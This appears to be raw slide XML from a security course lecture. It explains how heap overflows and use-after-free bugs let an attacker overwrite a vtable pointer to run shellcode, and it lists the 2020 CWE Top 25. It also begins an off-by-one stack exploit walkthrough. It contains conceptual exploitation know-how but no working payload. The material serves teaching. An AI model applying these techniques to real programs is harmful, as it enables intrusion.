            <a:off x="2488450" y="35875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14" name="Google Shape;414;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="1532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F9CB9C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="415" name="Google Shape;415;p45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488450" y="2227150"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="B45F06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16" name="Google Shape;416;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6546125" y="12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417" name="Google Shape;417;p45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="2212775"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="B45F0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8" name="Google Shape;418;p45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="35563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9" name="Google Shape;419;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546202" y="3988800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Code</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Google Shape;420;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4284600"/>
            <a:ext cx="32535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call a method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/>
              <a:t>, first follow a pointer on the heap to find the vtable…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21" name="Google Shape;421;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827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ClassX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> vtable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22" name="Google Shape;422;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="2343138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ClassY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="423" name="Google Shape;423;p45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5574525" y="1661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4" name="Google Shape;424;p45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5574525" y="3044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5" name="Google Shape;425;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3752475" y="4267000"/>
            <a:ext cx="32535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then follow a pointer in the vtable to find the instructions of the method.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1" name="Google Shape;431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vtables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4284600"/>
            <a:ext cx="33513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Suppose one of the instance variables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"/>
              <a:t> is a buffer we can overflow.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433" name="Google Shape;433;p46"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="385375" y="153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34" name="Google Shape;434;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385452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Heap</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="435" name="Google Shape;435;p46"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="290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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488450" y="35875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37" name="Google Shape;437;p46"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="1532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438" name="Google Shape;438;p46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488450" y="22271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39" name="Google Shape;439;p46"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6546125" y="12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440" name="Google Shape;440;p46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="2212775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1" name="Google Shape;441;p46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="35563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2" name="Google Shape;442;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546202" y="3988800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Code</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827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ClassX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> vtable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44" name="Google Shape;444;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="2343138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ClassY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="445" name="Google Shape;445;p46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5574525" y="1661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6" name="Google Shape;446;p46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5574525" y="3044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2" name="Google Shape;452;p4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vtables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Google Shape;453;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4157725"/>
            <a:ext cx="33513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attacker controls everything above the instance variable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"/>
              <a:t> on the heap, including the vtable pointer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/>
              <a:t>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454" name="Google Shape;454;p47"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="385375" y="153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55" name="Google Shape;455;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385452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Heap</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="456" name="Google Shape;456;p47"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="290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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="457" name="Google Shape;457;p47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488450" y="35875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58" name="Google Shape;458;p47"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="1532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459" name="Google Shape;459;p47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488450" y="22271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60" name="Google Shape;460;p47"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6546125" y="12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461" name="Google Shape;461;p47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="2212775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2" name="Google Shape;462;p47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="35563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3" name="Google Shape;463;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546202" y="3988800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Code</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Google Shape;464;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827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ClassX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> vtable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65" name="Google Shape;465;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="2343138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ClassY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="466" name="Google Shape;466;p47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5574525" y="1661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7" name="Google Shape;467;p47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5574525" y="3044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3" name="Google Shape;473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vtables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="474" name="Google Shape;474;p48"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="385375" y="153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0000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2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0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>address of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="12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SHELLCODE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SHELLCODE</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="12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9CB9C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instance variable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vtable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75" name="Google Shape;475;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385452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Heap</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Google Shape;476;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4157725"/>
            <a:ext cx="33513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vtable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/>
              <a:t> is now a pointer to shellcode. If method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foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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/>
              <a:t> is called, it will execute shellcode!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7" name="Google Shape;477;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136650" y="2205750"/>
            <a:ext cx="253750" cy="318098"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="23424" w="10150">
                <a:moveTo>
                  <a:pt x="10150" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9369" y="23424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78" name="Google Shape;478;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385452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Heap</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="479" name="Google Shape;479;p48"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="290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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="480" name="Google Shape;480;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488450" y="35875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81" name="Google Shape;481;p48"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="1532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address of 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2" name="Google Shape;482;p48"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6546125" y="1245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103150"/>
              </a:tblGrid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ClassY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bar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method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ClassX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274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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="483" name="Google Shape;483;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="2212775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4" name="Google Shape;484;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="3556350"/>
            <a:ext cx="97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5" name="Google Shape;485;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546202" y="3988800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Code</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Google Shape;486;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="3727025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ClassX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> vtable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87" name="Google Shape;487;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="2343138"/>
            <a:ext cx="210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14300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ourier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="488" name="Google Shape;488;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5574525" y="1661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9" name="Google Shape;489;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5574525" y="3044800"/>
            <a:ext cx="971700" cy="27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0" name="Google Shape;490;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2488450" y="2470850"/>
            <a:ext cx="253750" cy="318098"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="23424" w="10150">
                <a:moveTo>
                  <a:pt x="10150" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9369" y="23424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Heap Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Google Shape;496;p4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Heap overflow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Objects are allocated in the heap (using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malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in C 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new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in C++)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write to a buffer in the heap is not checked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overflows the buffer and overwrites the vtable pointer of the next object to point to a malicious vtable, with pointers to malicious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next object’s function is called, accessing the vtable pointer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Use-after-free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object is deallocated too early (using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free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in C 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delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in C++)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allocates memory, which returns the memory freed by the object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overwrites a vtable pointer under the attacker’s control to point to a malicious vtable, with pointers to malicious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deallocated object’s function is called, accessing the vtable pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Google Shape;497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 25 Most Dangerous Software Weaknesses (2020)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Google Shape;503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4" name="Google Shape;504;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="46771" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075" y="4439225"/>
            <a:ext cx="374875" cy="7042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05" name="Google Shape;505;p50"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="717100" y="1239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{98DD91E5-4378-45C4-B873-F09FD938B995}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="535825"/>
                <a:gridCol w="779400"/>
                <a:gridCol w="5653200"/>
                <a:gridCol w="746075"/>
              </a:tblGrid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Rank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ID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Name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Score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120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CWE-79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Neutralization of Input During Web Page Generation ('Cross-site Scripting')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46.82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110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[2]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CWE-787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Out-of-bounds Write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46.17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[3]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CWE-20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Input Validation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33.47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[4]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CWE-125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Out-of-bounds Read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26.50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[5]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CWE-119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Restriction of Operations within the Bounds of a Memory Buffer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23.73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02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[6]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CWE-89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Neutralization of Special Elements used in an SQL Command ('SQL Injection')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20.69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[7]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CWE-200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Exposure of Sensitive Information to an Unauthorized Actor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19.16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[8]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CWE-416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Use After Free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18.87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[9]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CWE-352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Cross-Site Request Forgery (CSRF)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17.29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02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[10]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CWE-78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Neutralization of Special Elements used in an OS Command ('OS Command Injection')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16.44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[11]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CWE-190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Integer Overflow or Wraparound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15.81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[12]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CWE-22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Limitation of a Pathname to a Restricted Directory ('Path Traversal')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13.67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[13]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CWE-476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NULL Pointer Dereference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8.35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[14]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CWE-287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Authentication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8.17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[15]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CWE-434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Unrestricted Upload of File with Dangerous Type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7.38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[16]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1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CWE-732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Incorrect Permission Assignment for Critical Resource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6.95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213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[17]</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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0097A7"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId2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CWE-94</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="sng">
                        <a:solidFill>
                          <a:srgbClr val="0097A7"/>
                        </a:solidFill>
                      </a:endParaRPr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Improper Control of Generation of Code ('Code Injection')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6.53</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="27425" marB="27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 Exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Google Shape;511;p51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3.5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6" name="Google Shape;516;p52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17" name="Google Shape;517;p52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518" name="Google Shape;518;p52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52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520" name="Google Shape;520;p52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21" name="Google Shape;521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522" name="Google Shape;522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3" name="Google Shape;523;p52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24" name="Google Shape;524;p52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25" name="Google Shape;525;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2429959" y="282230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26" name="Google Shape;526;p52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="525" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744959" y="294545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7" name="Google Shape;527;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="32060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28" name="Google Shape;528;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="33753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9" name="Google Shape;529;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="46957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ESP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30" name="Google Shape;530;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="4832575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531" name="Google Shape;531;p52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32" name="Google Shape;532;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="9234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Goal: Execute shellcode located at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What parts of memory is an attacker able to overwrite in this piece of code?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33" name="Google Shape;533;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8652625" y="2890588"/>
            <a:ext cx="387625" cy="477925"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="19117" w="18160">
                <a:moveTo>
                  <a:pt x="0" y="19117"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18160" y="19117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18160" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318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8" name="Google Shape;538;p53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39" name="Google Shape;539;p53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540" name="Google Shape;540;p53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1" name="Google Shape;541;p53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542" name="Google Shape;542;p53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43" name="Google Shape;543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544" name="Google Shape;544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5" name="Google Shape;545;p53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46" name="Google Shape;546;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2429959" y="282230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47" name="Google Shape;547;p53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="546" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744959" y="294545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8" name="Google Shape;548;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="32060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49" name="Google Shape;549;p53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="33753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0" name="Google Shape;550;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="46957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ESP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51" name="Google Shape;551;p53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="4832575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552" name="Google Shape;552;p53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\x60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53" name="Google Shape;553;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="1108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The attacker is able to overwrite all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lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and the least-significant byte of the SFP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If the attacker can change where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 points, how can they use this to execute shellcode?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54" name="Google Shape;554;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8652625" y="2890588"/>
            <a:ext cx="387625" cy="477925"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="19117" w="18160">
                <a:moveTo>
                  <a:pt x="0" y="19117"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18160" y="19117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18160" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318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55" name="Google Shape;555;p53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0" name="Google Shape;560;p54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61" name="Google Shape;561;p54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562" name="Google Shape;562;p54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3" name="Google Shape;563;p54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564" name="Google Shape;564;p54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65" name="Google Shape;565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566" name="Google Shape;566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7" name="Google Shape;567;p54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8" name="Google Shape;568;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2429959" y="282230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69" name="Google Shape;569;p54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="568" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744959" y="294545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0" name="Google Shape;570;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="32060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71" name="Google Shape;571;p54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="33753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2" name="Google Shape;572;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="46957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ESP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73" name="Google Shape;573;p54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="4832575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574" name="Google Shape;574;p54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75" name="Google Shape;575;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="1108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The SFP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 now points inside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lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which the attacker controls.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What does the SFP usually point to? What will the C program interpret the first bytes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lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as?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76" name="Google Shape;576;p54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77" name="Google Shape;577;p54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2" name="Google Shape;582;p55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83" name="Google Shape;583;p55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584" name="Google Shape;584;p55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5" name="Google Shape;585;p55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586" name="Google Shape;586;p55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87" name="Google Shape;587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588" name="Google Shape;58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9" name="Google Shape;589;p55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90" name="Google Shape;590;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
